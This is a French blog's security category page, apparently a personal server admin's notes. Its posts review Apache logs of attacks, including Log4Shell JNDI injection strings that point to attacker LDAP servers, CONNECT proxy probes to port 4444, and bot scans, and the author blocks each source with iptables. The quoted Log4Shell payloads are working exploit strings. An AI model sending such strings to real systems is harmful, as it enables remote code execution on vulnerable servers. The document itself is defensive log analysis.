Archives de catégorie : Sécurité

Audit des IP qui font des attaques log4j

Publié le par
Répondre

Petite recherche dans les logs :

170.210.45.163 - - [16/Dec/2021:06:19:46 +0100] "GET /${jndi:ldap://185.224.139.151:1389/Exploit} HTTP/1.1" 302 5113 "-" "Mozilla/5.0 (platform; rv:geckoversion) Gecko/geckotrail Firefox/firefox"
170.210.45.163 - - [16/Dec/2021:06:19:46 +0100] "GET / HTTP/1.1" 302 5113 "-" "${jndi:ldap://185.224.139.151:1389/Exploit}"
139.59.70.139 - - [16/Dec/2021:12:36:32 +0100] "GET / HTTP/1.0" 301 558 "${jndi:ldap://159.223.5.30:1389/a}" "nimaps/1.1 ${jndi:ldap://159.223.5.30:1389/a}"

J’ai donc bloqué les IPs :

# iptables -A INPUT -s 170.210.45.163 -j DROP
# iptables -A INPUT -s 139.59.70.139 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

Misère.

IP Address Country Region City
170.210.45.163 Argentina Ciudad Autonoma de Buenos Aires Buenos Aires
ISP Organization Latitude Longitude
Red de Interconexion Universitaria Not Available -34.6132 -58.3772
IP Address Country Region City
139.59.70.139 India Karnataka Bengaluru
ISP Organization Latitude Longitude
DigitalOcean LLC Not Available 12.9762 77.6033

Log « CONNECT 45.81.235.214:4444  » sur apache

Publié le par
Répondre

J’ai des logs étrange sur Apache :

45.81.235.112 - - [13/Dec/2021:02:12:50 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:02:38:18 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:07:19:54 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:07:41:24 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:08:02:29 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:08:23:59 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:08:44:56 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:09:05:58 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:09:27:36 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:09:48:41 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:10:10:16 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"
45.81.235.112 - - [13/Dec/2021:10:31:19 +0100] "CONNECT 45.81.235.214:4444 HTTP/1.1" 302 203 "-" "-"

J’ai donc bloqué l’IP

# iptables -A INPUT -s 45.81.235.112 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

A suivre.

IP Address Country Region City
45.81.235.112 Germany Hessen Frankfurt am Main
ISP Organization Latitude Longitude
Gericke KG Not Available 50.1155 8.6842

Scan de http://mj12bot.com/ , j’ai bloqué les IPs

Publié le par
Répondre

J’ai pu voir pas mal de scan :

# zgrep "MJ12bot" /var/log/apache2/access.*.gz  | sed 's/:/ /g' | awk '{print $2 " " $11}' | sort -n | uniq
95.91.75.28 /index.php?r=user/auth/login
95.91.75.28 /index.php?r=user/password-recovery
95.91.75.28 /robots.txt
95.91.75.28 /user/auth/login
144.76.137.254 /dashboard
144.76.137.254 /index.php?r=dashboard/dashboard
144.76.137.254 /robots.txt
144.76.137.254 /user/auth/login
144.76.137.254 /user/password-recovery
192.151.157.210 /
192.151.157.210 /robots.txt
192.151.157.210 /user/auth/login

J’ai donc supprimé les IP:

# iptables -A INPUT -s 144.76.137.254 -j DROP
# iptables -A INPUT -s 192.151.157.210 -j DRO
# iptables -A INPUT -s 95.91.75.28 -j DROP
# iptables -A INPUT -s 5.9.138.189 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

A suivre.

IP Address Country Region City
144.76.137.254 Germany Bayern Nuremberg
ISP Organization Latitude Longitude
Hetzner Online AG Not Available 49.4478 11.0683
IP Address Country Region City
192.151.157.210 United States of America Missouri Kansas City
ISP Organization Latitude Longitude
Jacob Beneke Not Available 39.1478 -94.5689
IP Address Country Region City
95.91.75.28 Germany Thuringen Muhlhausen
ISP Organization Latitude Longitude
Vodafone Deutschland GmbH Not Available 51.2090 10.4528

Attaque via l’IP 159.223.5.5, l’ISP : DigitalOcean LLC … sans surprise.

Publié le par
Répondre

Voici quelques logs :

159.223.5.5 - - [03/Nov/2021:13:00:43 +0100] "GET /3000D00E0000FFFF3F0031313744373731343634304537353046007A7A7A7A7A7A7A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000008047A7A7A7A7A7A7A7A7A0000000000000000000000000000000000000000000000000000000000000000 HTTP/1.1" 403 443 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
159.223.5.5 - - [03/Nov/2021:13:00:46 +0100] "\xbf\xbf\xaf\xaf~" 400 0 "-" "-"
159.223.5.5 - - [03/Nov/2021:13:00:46 +0100] "POST / HTTP/1.1" 302 256 "-" "WinHttpClient"
159.223.5.5 - - [03/Nov/2021:13:00:48 +0100] "\x17\x03\x01\x01\x04e" 400 0 "-" "-"
159.223.5.5 - - [03/Nov/2021:13:00:48 +0100] "\x17\x03\x01\x01\x04e" 400 0 "-" "-"

Comme toujours c’est DigitalOcean :

IP Address Country Region City
159.223.5.5 Netherlands Noord-Holland Amsterdam
ISP Organization Latitude Longitude
DigitalOcean LLC Not Available 52.3740 4.8897

 

Bye-Bye :

iptables -A INPUT -s 159.223.5.5 -j DROP